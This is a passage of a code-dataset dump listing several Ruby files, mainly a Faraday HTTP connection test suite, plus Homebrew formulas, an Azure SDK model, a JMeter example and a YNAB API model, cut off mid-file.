hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
267eaace3df2ec80274b48db7d52280879eb37a5 | 619 | require 'xcpretty/term'
# Specs for XCPretty::Term: unicode support is derived from the process's
# default external encoding, color support from whether STDOUT is a TTY.
# NOTE(review): uses the old monkey-patched rspec-mocks `stub` and
# rspec-expectations `.should` syntax, both deprecated in RSpec 3 —
# consider migrating to `allow(...).to receive` / `expect(...)`.
module XCPretty
  describe Term do
    it "marks unicode as unavailable" do
      # ASCII default encoding => no unicode output.
      Encoding.stub(:default_external).and_return(Encoding::ASCII)
      Term.unicode?.should be false
    end
    it "marks unicode as available" do
      Encoding.stub(:default_external).and_return(Encoding::UTF_8)
      Term.unicode?.should be true
    end
    it 'marks color as unavailable' do
      # Non-TTY stdout (e.g. piped output) disables color.
      STDOUT.stub(:tty?).and_return(false)
      Term.color?.should be false
    end
    it 'marks color as available' do
      STDOUT.stub(:tty?).and_return(true)
      Term.color?.should be true
    end
  end
end
| 22.925926 | 66 | 0.678514 |
014044329a20df7ba91f3f11076bba2e51ad0812 | 46 | require 'action_dispatch'
require 'rack/test'
| 15.333333 | 25 | 0.804348 |
acbe8a45cc68e9793c847ccb860e149a84cd82b6 | 22,836 | # frozen_string_literal: true
# Shared examples verifying URL parsing at construction time.
# Expects the including context to define `subject` (the connection) and to
# consume the `address` let defined by each nested context.
shared_examples 'initializer with url' do
  context 'with simple url' do
    let(:address) { 'http://sushi.com' }
    it { expect(subject.host).to eq('sushi.com') }
    it { expect(subject.port).to eq(80) }
    it { expect(subject.scheme).to eq('http') }
    it { expect(subject.path_prefix).to eq('/') }
    it { expect(subject.params).to eq({}) }
  end
  context 'with complex url' do
    let(:address) { 'http://sushi.com:815/fish?a=1' }
    it { expect(subject.port).to eq(815) }
    it { expect(subject.path_prefix).to eq('/fish') }
    it { expect(subject.params).to eq('a' => '1') }
  end
  context 'with IPv6 address' do
    let(:address) { 'http://[::1]:85/' }
    # IPv6 literals keep their brackets in the parsed host.
    it { expect(subject.host).to eq('[::1]') }
    it { expect(subject.port).to eq(85) }
  end
end
# Shared examples verifying that Faraday.default_connection_options (expected
# to be preset with request.timeout = 10 by the including context) apply to
# new connections and are not mutated by per-instance changes.
shared_examples 'default connection options' do
  # Reset global state so later examples are unaffected.
  after { Faraday.default_connection_options = nil }
  it 'works with implicit url' do
    conn = Faraday.new 'http://sushi.com/foo'
    expect(conn.options.timeout).to eq(10)
  end
  it 'works with option url' do
    conn = Faraday.new url: 'http://sushi.com/foo'
    expect(conn.options.timeout).to eq(10)
  end
  it 'works with instance connection options' do
    conn = Faraday.new 'http://sushi.com/foo', request: { open_timeout: 1 }
    expect(conn.options.timeout).to eq(10)
    expect(conn.options.open_timeout).to eq(1)
  end
  it 'default connection options persist with an instance overriding' do
    conn = Faraday.new 'http://nigiri.com/bar'
    conn.options.timeout = 1
    expect(Faraday.default_connection_options.request.timeout).to eq(10)
    other = Faraday.new url: 'https://sushi.com/foo'
    other.options.timeout = 1
    expect(Faraday.default_connection_options.request.timeout).to eq(10)
  end
  it 'default connection uses default connection options' do
    expect(Faraday.default_connection.options.timeout).to eq(10)
  end
end
RSpec.describe Faraday::Connection do
let(:conn) { Faraday::Connection.new(url, options) }
let(:url) { nil }
let(:options) { nil }
describe '.new' do
subject { conn }
context 'with implicit url param' do
# Faraday::Connection.new('http://sushi.com')
let(:url) { address }
it_behaves_like 'initializer with url'
end
context 'with explicit url param' do
# Faraday::Connection.new(url: 'http://sushi.com')
let(:url) { { url: address } }
it_behaves_like 'initializer with url'
end
context 'with custom builder' do
let(:custom_builder) { Faraday::RackBuilder.new }
let(:options) { { builder: custom_builder } }
it { expect(subject.builder).to eq(custom_builder) }
end
context 'with custom params' do
let(:options) { { params: { a: 1 } } }
it { expect(subject.params).to eq('a' => 1) }
end
context 'with custom params and params in url' do
let(:url) { 'http://sushi.com/fish?a=1&b=2' }
let(:options) { { params: { a: 3 } } }
it { expect(subject.params).to eq('a' => 3, 'b' => '2') }
end
context 'with custom headers' do
let(:options) { { headers: { user_agent: 'Faraday' } } }
it { expect(subject.headers['User-agent']).to eq('Faraday') }
end
context 'with ssl false' do
let(:options) { { ssl: { verify: false } } }
it { expect(subject.ssl.verify?).to be_falsey }
end
context 'with empty block' do
let(:conn) { Faraday::Connection.new {} }
it { expect(conn.builder.handlers.size).to eq(0) }
end
context 'with block' do
let(:conn) do
Faraday::Connection.new(params: { 'a' => '1' }) do |faraday|
faraday.adapter :net_http
faraday.url_prefix = 'http://sushi.com/omnom'
end
end
it { expect(conn.builder.handlers.size).to eq(0) }
it { expect(conn.path_prefix).to eq('/omnom') }
end
end
describe '#close' do
it 'can close underlying app' do
expect(conn.app).to receive(:close)
conn.close
end
end
describe 'basic_auth' do
subject { conn }
context 'calling the #basic_auth method' do
before { subject.basic_auth 'Aladdin', 'open sesame' }
it { expect(subject.headers['Authorization']).to eq('Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==') }
end
context 'adding basic auth info to url' do
let(:url) { 'http://Aladdin:open%[email protected]/fish' }
it { expect(subject.headers['Authorization']).to eq('Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==') }
end
end
describe '#token_auth' do
before { subject.token_auth('abcdef', nonce: 'abc') }
it { expect(subject.headers['Authorization']).to eq('Token nonce="abc", token="abcdef"') }
end
describe '#build_exclusive_url' do
context 'with relative path' do
subject { conn.build_exclusive_url('sake.html') }
it 'uses connection host as default host' do
conn.host = 'sushi.com'
expect(subject.host).to eq('sushi.com')
expect(subject.scheme).to eq('http')
end
it do
conn.path_prefix = '/fish'
expect(subject.path).to eq('/fish/sake.html')
end
it do
conn.path_prefix = '/'
expect(subject.path).to eq('/sake.html')
end
it do
conn.path_prefix = 'fish'
expect(subject.path).to eq('/fish/sake.html')
end
it do
conn.path_prefix = '/fish/'
expect(subject.path).to eq('/fish/sake.html')
end
end
context 'with absolute path' do
subject { conn.build_exclusive_url('/sake.html') }
after { expect(subject.path).to eq('/sake.html') }
it { conn.path_prefix = '/fish' }
it { conn.path_prefix = '/' }
it { conn.path_prefix = 'fish' }
it { conn.path_prefix = '/fish/' }
end
context 'with complete url' do
subject { conn.build_exclusive_url('http://sushi.com/sake.html?a=1') }
it { expect(subject.scheme).to eq('http') }
it { expect(subject.host).to eq('sushi.com') }
it { expect(subject.port).to eq(80) }
it { expect(subject.path).to eq('/sake.html') }
it { expect(subject.query).to eq('a=1') }
end
it 'overrides connection port for absolute url' do
conn.port = 23
uri = conn.build_exclusive_url('http://sushi.com')
expect(uri.port).to eq(80)
end
it 'does not add ending slash given nil url' do
conn.url_prefix = 'http://sushi.com/nigiri'
uri = conn.build_exclusive_url
expect(uri.path).to eq('/nigiri')
end
it 'does not add ending slash given empty url' do
conn.url_prefix = 'http://sushi.com/nigiri'
uri = conn.build_exclusive_url('')
expect(uri.path).to eq('/nigiri')
end
it 'does not use connection params' do
conn.url_prefix = 'http://sushi.com/nigiri'
conn.params = { a: 1 }
expect(conn.build_exclusive_url.to_s).to eq('http://sushi.com/nigiri')
end
it 'allows to provide params argument' do
conn.url_prefix = 'http://sushi.com/nigiri'
conn.params = { a: 1 }
params = Faraday::Utils::ParamsHash.new
params[:a] = 2
uri = conn.build_exclusive_url(nil, params)
expect(uri.to_s).to eq('http://sushi.com/nigiri?a=2')
end
it 'handles uri instances' do
uri = conn.build_exclusive_url(URI('/sake.html'))
expect(uri.path).to eq('/sake.html')
end
context 'with url_prefixed connection' do
let(:url) { 'http://sushi.com/sushi/' }
it 'parses url and changes scheme' do
conn.scheme = 'https'
uri = conn.build_exclusive_url('sake.html')
expect(uri.to_s).to eq('https://sushi.com/sushi/sake.html')
end
it 'joins url to base with ending slash' do
uri = conn.build_exclusive_url('sake.html')
expect(uri.to_s).to eq('http://sushi.com/sushi/sake.html')
end
it 'used default base with ending slash' do
uri = conn.build_exclusive_url
expect(uri.to_s).to eq('http://sushi.com/sushi/')
end
it 'overrides base' do
uri = conn.build_exclusive_url('/sake/')
expect(uri.to_s).to eq('http://sushi.com/sake/')
end
end
context 'with colon in path' do
let(:url) { 'http://service.com' }
it 'joins url to base when used absolute path' do
conn = Faraday.new(url: url)
uri = conn.build_exclusive_url('/service:search?limit=400')
expect(uri.to_s).to eq('http://service.com/service:search?limit=400')
end
it 'joins url to base when used relative path' do
conn = Faraday.new(url: url)
uri = conn.build_exclusive_url('service:search?limit=400')
expect(uri.to_s).to eq('http://service.com/service%3Asearch?limit=400')
end
it 'joins url to base when used with path prefix' do
conn = Faraday.new(url: url)
conn.path_prefix = '/api'
uri = conn.build_exclusive_url('service:search?limit=400')
expect(uri.to_s).to eq('http://service.com/api/service%3Asearch?limit=400')
end
end
end
describe '#build_url' do
let(:url) { 'http://sushi.com/nigiri' }
it 'uses params' do
conn.params = { a: 1, b: 1 }
expect(conn.build_url.to_s).to eq('http://sushi.com/nigiri?a=1&b=1')
end
it 'merges params' do
conn.params = { a: 1, b: 1 }
url = conn.build_url(nil, b: 2, c: 3)
expect(url.to_s).to eq('http://sushi.com/nigiri?a=1&b=2&c=3')
end
end
describe '#build_request' do
let(:url) { 'https://asushi.com/sake.html' }
let(:request) { conn.build_request(:get) }
before do
conn.headers = { 'Authorization' => 'token abc123' }
request.headers.delete('Authorization')
end
it { expect(conn.headers.keys).to eq(['Authorization']) }
it { expect(conn.headers.include?('Authorization')).to be_truthy }
it { expect(request.headers.keys).to be_empty }
it { expect(request.headers.include?('Authorization')).to be_falsey }
end
describe '#to_env' do
subject { conn.build_request(:get).to_env(conn).url }
let(:url) { 'http://sushi.com/sake.html' }
let(:options) { { params: @params } }
it 'parses url params into query' do
@params = { 'a[b]' => '1 + 2' }
expect(subject.query).to eq('a%5Bb%5D=1+%2B+2')
end
it 'escapes per spec' do
@params = { 'a' => '1+2 foo~bar.-baz' }
expect(subject.query).to eq('a=1%2B2+foo~bar.-baz')
end
it 'bracketizes nested params in query' do
@params = { 'a' => { 'b' => 'c' } }
expect(subject.query).to eq('a%5Bb%5D=c')
end
it 'bracketizes repeated params in query' do
@params = { 'a' => [1, 2] }
expect(subject.query).to eq('a%5B%5D=1&a%5B%5D=2')
end
it 'without braketizing repeated params in query' do
@params = { 'a' => [1, 2] }
conn.options.params_encoder = Faraday::FlatParamsEncoder
expect(subject.query).to eq('a=1&a=2')
end
end
describe 'proxy support' do
it 'accepts string' do
with_env 'http_proxy' => 'http://env-proxy.com:80' do
conn.proxy = 'http://proxy.com'
expect(conn.proxy.host).to eq('proxy.com')
end
end
it 'accepts uri' do
with_env 'http_proxy' => 'http://env-proxy.com:80' do
conn.proxy = URI.parse('http://proxy.com')
expect(conn.proxy.host).to eq('proxy.com')
end
end
it 'accepts hash with string uri' do
with_env 'http_proxy' => 'http://env-proxy.com:80' do
conn.proxy = { uri: 'http://proxy.com', user: 'rick' }
expect(conn.proxy.host).to eq('proxy.com')
expect(conn.proxy.user).to eq('rick')
end
end
it 'accepts hash' do
with_env 'http_proxy' => 'http://env-proxy.com:80' do
conn.proxy = { uri: URI.parse('http://proxy.com'), user: 'rick' }
expect(conn.proxy.host).to eq('proxy.com')
expect(conn.proxy.user).to eq('rick')
end
end
it 'accepts http env' do
with_env 'http_proxy' => 'http://env-proxy.com:80' do
expect(conn.proxy.host).to eq('env-proxy.com')
end
end
it 'accepts http env with auth' do
with_env 'http_proxy' => 'http://a%40b:my%[email protected]:80' do
expect(conn.proxy.user).to eq('a@b')
expect(conn.proxy.password).to eq('my pass')
end
end
it 'accepts env without scheme' do
with_env 'http_proxy' => 'localhost:8888' do
uri = conn.proxy[:uri]
expect(uri.host).to eq('localhost')
expect(uri.port).to eq(8888)
end
end
it 'fetches no proxy from nil env' do
with_env 'http_proxy' => nil do
expect(conn.proxy).to be_nil
end
end
it 'fetches no proxy from blank env' do
with_env 'http_proxy' => '' do
expect(conn.proxy).to be_nil
end
end
it 'does not accept uppercase env' do
with_env 'HTTP_PROXY' => 'http://localhost:8888/' do
expect(conn.proxy).to be_nil
end
end
it 'allows when url in no proxy list' do
with_env 'http_proxy' => 'http://proxy.com', 'no_proxy' => 'example.com' do
conn = Faraday::Connection.new('http://example.com')
expect(conn.proxy).to be_nil
end
end
it 'allows when url in no proxy list with url_prefix' do
with_env 'http_proxy' => 'http://proxy.com', 'no_proxy' => 'example.com' do
conn = Faraday::Connection.new
conn.url_prefix = 'http://example.com'
expect(conn.proxy).to be_nil
end
end
it 'allows when prefixed url is not in no proxy list' do
with_env 'http_proxy' => 'http://proxy.com', 'no_proxy' => 'example.com' do
conn = Faraday::Connection.new('http://prefixedexample.com')
expect(conn.proxy.host).to eq('proxy.com')
end
end
it 'allows when subdomain url is in no proxy list' do
with_env 'http_proxy' => 'http://proxy.com', 'no_proxy' => 'example.com' do
conn = Faraday::Connection.new('http://subdomain.example.com')
expect(conn.proxy).to be_nil
end
end
it 'allows when url not in no proxy list' do
with_env 'http_proxy' => 'http://proxy.com', 'no_proxy' => 'example2.com' do
conn = Faraday::Connection.new('http://example.com')
expect(conn.proxy.host).to eq('proxy.com')
end
end
it 'allows when ip address is not in no proxy list but url is' do
with_env 'http_proxy' => 'http://proxy.com', 'no_proxy' => 'localhost' do
conn = Faraday::Connection.new('http://127.0.0.1')
expect(conn.proxy).to be_nil
end
end
it 'allows when url is not in no proxy list but ip address is' do
with_env 'http_proxy' => 'http://proxy.com', 'no_proxy' => '127.0.0.1' do
conn = Faraday::Connection.new('http://localhost')
expect(conn.proxy).to be_nil
end
end
it 'allows in multi element no proxy list' do
with_env 'http_proxy' => 'http://proxy.com', 'no_proxy' => 'example0.com,example.com,example1.com' do
expect(Faraday::Connection.new('http://example0.com').proxy).to be_nil
expect(Faraday::Connection.new('http://example.com').proxy).to be_nil
expect(Faraday::Connection.new('http://example1.com').proxy).to be_nil
expect(Faraday::Connection.new('http://example2.com').proxy.host).to eq('proxy.com')
end
end
it 'test proxy requires uri' do
expect { conn.proxy = { uri: :bad_uri, user: 'rick' } }.to raise_error(ArgumentError)
end
it 'uses env http_proxy' do
with_env 'http_proxy' => 'http://proxy.com' do
conn = Faraday.new
expect(conn.instance_variable_get('@manual_proxy')).to be_falsey
expect(conn.proxy_for_request('http://google.co.uk').host).to eq('proxy.com')
end
end
it 'uses processes no_proxy before http_proxy' do
with_env 'http_proxy' => 'http://proxy.com', 'no_proxy' => 'google.co.uk' do
conn = Faraday.new
expect(conn.instance_variable_get('@manual_proxy')).to be_falsey
expect(conn.proxy_for_request('http://google.co.uk')).to be_nil
end
end
it 'uses env https_proxy' do
with_env 'https_proxy' => 'https://proxy.com' do
conn = Faraday.new
expect(conn.instance_variable_get('@manual_proxy')).to be_falsey
expect(conn.proxy_for_request('https://google.co.uk').host).to eq('proxy.com')
end
end
it 'uses processes no_proxy before https_proxy' do
with_env 'https_proxy' => 'https://proxy.com', 'no_proxy' => 'google.co.uk' do
conn = Faraday.new
expect(conn.instance_variable_get('@manual_proxy')).to be_falsey
expect(conn.proxy_for_request('https://google.co.uk')).to be_nil
end
end
it 'gives priority to manually set proxy' do
with_env 'https_proxy' => 'https://proxy.com', 'no_proxy' => 'google.co.uk' do
conn = Faraday.new
conn.proxy = 'http://proxy2.com'
expect(conn.instance_variable_get('@manual_proxy')).to be_truthy
expect(conn.proxy_for_request('https://google.co.uk').host).to eq('proxy2.com')
end
end
it 'ignores env proxy if set that way' do
with_env_proxy_disabled do
with_env 'http_proxy' => 'http://duncan.proxy.com:80' do
expect(conn.proxy).to be_nil
end
end
end
context 'performing a request' do
before { stub_request(:get, 'http://example.com') }
it 'dynamically checks proxy' do
with_env 'http_proxy' => 'http://proxy.com:80' do
conn = Faraday.new
expect(conn.proxy.uri.host).to eq('proxy.com')
conn.get('http://example.com') do |req|
expect(req.options.proxy.uri.host).to eq('proxy.com')
end
end
conn.get('http://example.com')
expect(conn.instance_variable_get('@temp_proxy')).to be_nil
end
it 'dynamically check no proxy' do
with_env 'http_proxy' => 'http://proxy.com', 'no_proxy' => 'example.com' do
conn = Faraday.new
expect(conn.proxy.uri.host).to eq('proxy.com')
conn.get('http://example.com') do |req|
expect(req.options.proxy).to be_nil
end
end
end
end
end
describe '#dup' do
subject { conn.dup }
let(:url) { 'http://sushi.com/foo' }
let(:options) do
{
ssl: { verify: :none },
headers: { 'content-type' => 'text/plain' },
params: { 'a' => '1' },
request: { timeout: 5 }
}
end
it { expect(subject.build_exclusive_url).to eq(conn.build_exclusive_url) }
it { expect(subject.headers['content-type']).to eq('text/plain') }
it { expect(subject.params['a']).to eq('1') }
context 'after manual changes' do
before do
subject.basic_auth('', '')
subject.headers['content-length'] = 12
subject.params['b'] = '2'
subject.options[:open_timeout] = 10
end
it { expect(subject.builder.handlers.size).to eq(1) }
it { expect(conn.builder.handlers.size).to eq(1) }
it { expect(conn.headers.key?('content-length')).to be_falsey }
it { expect(conn.params.key?('b')).to be_falsey }
it { expect(subject.options[:timeout]).to eq(5) }
it { expect(conn.options[:open_timeout]).to be_nil }
end
end
describe '#respond_to?' do
it { expect(Faraday.respond_to?(:get)).to be_truthy }
it { expect(Faraday.respond_to?(:post)).to be_truthy }
end
describe 'default_connection_options' do
context 'assigning a default value' do
before do
Faraday.default_connection_options = nil
Faraday.default_connection_options.request.timeout = 10
end
it_behaves_like 'default connection options'
end
context 'assigning a hash' do
before { Faraday.default_connection_options = { request: { timeout: 10 } } }
it_behaves_like 'default connection options'
end
end
describe 'request params' do
context 'with simple url' do
let(:url) { 'http://example.com' }
let!(:stubbed) { stub_request(:get, 'http://example.com?a=a&p=3') }
after { expect(stubbed).to have_been_made.once }
it 'test_overrides_request_params' do
conn.get('?p=2&a=a', p: 3)
end
it 'test_overrides_request_params_block' do
conn.get('?p=1&a=a', p: 2) do |req|
req.params[:p] = 3
end
end
it 'test_overrides_request_params_block_url' do
conn.get(nil, p: 2) do |req|
req.url('?p=1&a=a', 'p' => 3)
end
end
end
context 'with url and extra params' do
let(:url) { 'http://example.com?a=1&b=2' }
let(:options) { { params: { c: 3 } } }
it 'merges connection and request params' do
stubbed = stub_request(:get, 'http://example.com?a=1&b=2&c=3&limit=5&page=1')
conn.get('?page=1', limit: 5)
expect(stubbed).to have_been_made.once
end
it 'allows to override all params' do
stubbed = stub_request(:get, 'http://example.com?b=b')
conn.get('?p=1&a=a', p: 2) do |req|
expect(req.params[:a]).to eq('a')
expect(req.params['c']).to eq(3)
expect(req.params['p']).to eq(2)
req.params = { b: 'b' }
expect(req.params['b']).to eq('b')
end
expect(stubbed).to have_been_made.once
end
it 'allows to set params_encoder for single request' do
encoder = Object.new
def encoder.encode(params)
params.map { |k, v| "#{k.upcase}-#{v.to_s.upcase}" }.join(',')
end
stubbed = stub_request(:get, 'http://example.com/?A-1,B-2,C-3,FEELING-BLUE')
conn.get('/', feeling: 'blue') do |req|
req.options.params_encoder = encoder
end
expect(stubbed).to have_been_made.once
end
end
context 'with default params encoder' do
let!(:stubbed) { stub_request(:get, 'http://example.com?color%5B%5D=red&color%5B%5D=blue') }
after { expect(stubbed).to have_been_made.once }
it 'supports array params in url' do
conn.get('http://example.com?color[]=red&color[]=blue')
end
it 'supports array params in params' do
conn.get('http://example.com', color: %w[red blue])
end
end
context 'with flat params encoder' do
let(:options) { { request: { params_encoder: Faraday::FlatParamsEncoder } } }
let!(:stubbed) { stub_request(:get, 'http://example.com?color=blue') }
after { expect(stubbed).to have_been_made.once }
it 'supports array params in params' do
conn.get('http://example.com', color: %w[red blue])
end
context 'with array param in url' do
let(:url) { 'http://example.com?color[]=red&color[]=blue' }
it do
conn.get('/')
end
end
end
end
end
| 31.282192 | 107 | 0.606148 |
7aca756a7c4d22673b96a9fee343c7aa767c1a2a | 264 | FactoryGirl.define do
factory :search, class: KatSearch::Search do
search 'suits s05e16'
initialize_with { new(search) }
end
factory :search_failed, class: KatSearch::Search do
search 'suits s05e72'
initialize_with { new(search) }
end
end
| 22 | 53 | 0.708333 |
38f526d91a4b0d89a0614d948f919145206cb3e9 | 2,755 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Network::Mgmt::V2020_06_01
module Models
#
# Network Intent Policy resource.
#
class NetworkIntentPolicy < Resource
include MsRestAzure
# @return [String] A unique read-only string that changes whenever the
# resource is updated.
attr_accessor :etag
#
# Mapper for NetworkIntentPolicy class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'NetworkIntentPolicy',
type: {
name: 'Composite',
class_name: 'NetworkIntentPolicy',
model_properties: {
id: {
client_side_validation: true,
required: false,
serialized_name: 'id',
type: {
name: 'String'
}
},
name: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'name',
type: {
name: 'String'
}
},
type: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'type',
type: {
name: 'String'
}
},
location: {
client_side_validation: true,
required: false,
serialized_name: 'location',
type: {
name: 'String'
}
},
tags: {
client_side_validation: true,
required: false,
serialized_name: 'tags',
type: {
name: 'Dictionary',
value: {
client_side_validation: true,
required: false,
serialized_name: 'StringElementType',
type: {
name: 'String'
}
}
}
},
etag: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'etag',
type: {
name: 'String'
}
}
}
}
}
end
end
end
end
| 27.828283 | 76 | 0.427223 |
1d9cc707aafd4ca0675bd4d004171fb15aed33a5 | 1,330 | class Libraw < Formula
desc "Library for reading RAW files from digital photo cameras"
homepage "https://www.libraw.org/"
url "https://www.libraw.org/data/LibRaw-0.19.0.tar.gz"
sha256 "e83f51e83b19f9ba6b8bd144475fc12edf2d7b3b930d8d280bdebd8a8f3ed259"
bottle do
cellar :any
sha256 "3304c2735f53a0967fd6ca446365d12e455119fe331b36af666b6b64bbcafa08" => :high_sierra
sha256 "b8fd178ff8f28172a77b109daa7b8e71f564291fe9725f0e096988ec258f742f" => :sierra
sha256 "aa91b68a3f4aa66cca36c0348e2167339319ee1628ab0369031473b4a4cfe043" => :el_capitan
end
depends_on "pkg-config" => :build
depends_on "jasper"
depends_on "jpeg"
depends_on "little-cms2"
resource "librawtestfile" do
url "https://www.rawsamples.ch/raws/nikon/d1/RAW_NIKON_D1.NEF",
:using => :nounzip
sha256 "7886d8b0e1257897faa7404b98fe1086ee2d95606531b6285aed83a0939b768f"
end
def install
system "./configure", "--prefix=#{prefix}",
"--disable-dependency-tracking"
system "make"
system "make", "install"
doc.install Dir["doc/*"]
prefix.install "samples"
end
test do
resource("librawtestfile").stage do
filename = "RAW_NIKON_D1.NEF"
system "#{bin}/raw-identify", "-u", filename
system "#{bin}/simple_dcraw", "-v", "-T", filename
end
end
end
| 31.666667 | 93 | 0.712782 |
ed60164d214402859269f7bf195f8996c97f7744 | 282 | cask 'hashbackup' do
version '2125'
sha256 '462a6f5c1d0194712ea2c6ebba0480fdbe17aafaf3735f009595e0bdf98daf6c'
url "http://www.hashbackup.com/download/hb-#{version}-mac-64bit.tar.gz"
name 'hashbackup'
homepage 'http://www.hashbackup.com/'
binary "hb-#{version}/hb"
end
| 25.636364 | 75 | 0.751773 |
6a605d3ce17e0b2f5e0bad730606c6f2bb989ad1 | 1,167 | require "bundler/setup"
require "pressy"
# Global RSpec configuration for the pressy test suite.
RSpec.configure do |config|
  # Enable flags like --only-failures and --next-failure
  config.example_status_persistence_file_path = ".rspec_status"
  # Disable RSpec exposing methods globally on `Module` and `main`
  config.disable_monkey_patching!
  config.expect_with :rspec do |c|
    c.syntax = :expect
  end
end
# Shared contract for every Pressy command class: it exposes the expected
# command name, is registered in the default registry, and accepts an empty
# argument list. Include with `it_behaves_like "command", :name` from a spec
# whose described_class is the command.
RSpec.shared_examples "command" do |name|
  let(:stderr) { StringIO.new }
  let(:console) { instance_double("Pressy::Console", error: stderr) }
  let(:env) { {} }
  let(:site) { instance_double("Pressy::Site") }
  let(:registry) { Pressy::Command::Registry.new }
  let(:runner) { Pressy::Command::Runner.new(registry, site, console, env) }

  before do
    registry.register(described_class)
  end

  it "has command name '#{name}'" do
    # `be` (identity) works because command names are symbols.
    expect(described_class.name).to be name
  end

  it "is registered in the default command registry" do
    registry = Pressy::Command::Registry.default
    expect(registry.lookup(name)).to be described_class
  end

  it "parses an empty list of arguments" do
    args = []
    expect(described_class.parse!(args)).to eq({})
    expect(args).to be_empty
  end
end
| 26.522727 | 76 | 0.703513 |
9187a71d1fa6090ff66040507d12540ee510b70d | 1,333 | class Nettoe < Formula
desc "Tic Tac Toe-like game for the console"
homepage "https://nettoe.sourceforge.io/"
url "https://downloads.sourceforge.net/project/nettoe/nettoe/1.5.1/nettoe-1.5.1.tar.gz"
sha256 "dbc2c08e7e0f7e60236954ee19a165a350ab3e0bcbbe085ecd687f39253881cb"
license "GPL-2.0"
livecheck do
url :stable
end
bottle do
sha256 cellar: :any_skip_relocation, catalina: "59cab1291f69cb1c35a269d18343a3d07eaf55d6f0d178c9548afb282497fc50"
sha256 cellar: :any_skip_relocation, mojave: "2d45bfae915cfc4425e45393a9868c4e586379c05e61f35aaf704cc54376c17c"
sha256 cellar: :any_skip_relocation, high_sierra: "0349c1335e428d5f0b620043259908b5af60feed84d9dea911033e0d65704488"
sha256 cellar: :any_skip_relocation, sierra: "49ad705043bdd9f1ab860d877d3ffba584bef5ddbd4c03f6fe43adc49b9c1e5d"
sha256 cellar: :any_skip_relocation, el_capitan: "c8208683e4730233147e6c7153a469cdc1f477aacde0559937f0da93c8ad0345"
sha256 cellar: :any_skip_relocation, yosemite: "78038d253cd382f5f3a6b3b12c7776828c44c1572f0569bec862763aa5141c2a"
end
def install
system "./configure", "--disable-dependency-tracking",
"--prefix=#{prefix}"
system "make", "install"
end
test do
assert_match(/netToe #{version} /, shell_output("#{bin}/nettoe -v"))
end
end
| 43 | 120 | 0.770443 |
397b758fafc6bcbe8eb58c83547b0eb625c57c9d | 448 | $LOAD_PATH.unshift(File.join(File.dirname(__FILE__), '..', 'lib'))
require 'ruby-jmeter'
# Build a JMeter test plan (10 threads hitting the home page) and rsync the
# generated .jmx to a remote host for execution.
# NOTE(review): remote_host is a placeholder and rsync_params hard-codes an
# SSH key path — parameterize via ENV before using outside of examples.
test do
  threads count: 10 do
    visit name: 'Home Page', url: 'https://flooded.io'
  end
end.rsync(
  remote_host: 'xxx.xxx.xxx.xxx',
  remote_user: 'user',
  remote_path: '/path/to/remote',
  rsync_bin_path: '/usr/bin/rsync',
  rsync_params: '-az -e "ssh -i /path/to/key.pem"',
  # Output .jmx is named after this script file.
  file: './jmx/' + File.basename(__FILE__, ".rb") + '.jmx',
  debug: true
)
| 26.352941 | 66 | 0.642857 |
388f6430b190f2dc6b037220d2ad2a78dd722147 | 5,573 | =begin
#YNAB API Endpoints
#Our API uses a REST based design, leverages the JSON data format, and relies upon HTTPS for transport. We respond with meaningful HTTP response codes and if an error occurs, we include error details in the response body. API Documentation is at https://api.youneedabudget.com
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.19
=end
require 'date'
module YNAB
class BudgetSettingsResponseData
attr_accessor :settings
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'settings' => :'settings'
}
end
# Attribute type mapping.
def self.swagger_types
{
:'settings' => :'BudgetSettings'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
if attributes.has_key?(:'settings')
self.settings = attributes[:'settings']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
if @settings.nil?
invalid_properties.push('invalid value for "settings", settings cannot be nil.')
end
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if @settings.nil?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
settings == o.settings
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[settings].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
